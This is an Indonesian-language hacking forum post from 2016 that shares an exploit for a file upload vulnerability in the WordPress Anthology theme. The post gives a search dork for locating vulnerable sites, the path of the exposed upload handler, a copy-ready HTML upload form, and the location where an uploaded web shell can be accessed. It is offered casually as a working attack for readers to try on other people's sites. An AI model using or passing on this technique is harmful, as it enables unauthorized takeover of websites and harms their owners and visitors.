Exploit WordPress Anthology Themes Remote File Upload Vulnerability

by Nue Bhandell - 03-10-2016 at 06:25 PM
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-10-2016, 06:25 PM
Aloo Malam gengs, tengah malam gini masih ada yg idup gak nih ? wkwkw  :D
iseng2 share exploit lama, kali aja masih crotz awkakw.
yg dh master minggir dlu beb  :heart:

lanjot.

inurl:/wp-content/themes/Anthology/
(sisanya kembangin lagi, gunakan imajinasi vokever kalian, biar bisa dpt yang vuln and verawan).

exploit: /wp-content/themes/Anthology/functions/upload-handler.php

ciri2 vuln o.O ?
muncul error atau blank *kira2 sih gitu, maap kalo salah akwakawk

[Image: a3vN8Ln.png]

Copy Script CSRF Upload nya:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />

</form>


jika sudah buka CSRF Upload nya, lalu upload deh file/shell kalian.
Jika Upload nya sukses nanti akan muncul nama file/shell kalian gengs :3

[Image: TqGjVFQ.png]

Shell Akses: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

[Image: necnt7I.png]

Done x_O

kunjungin blog saya juga ya gengs: TKJ Cyber Art


Sumur


semoga bermanfaat Gengs, maap kalo post cupu  :)
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk masih Ujian Sekolah gengs wkwkwk.
bye ..
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)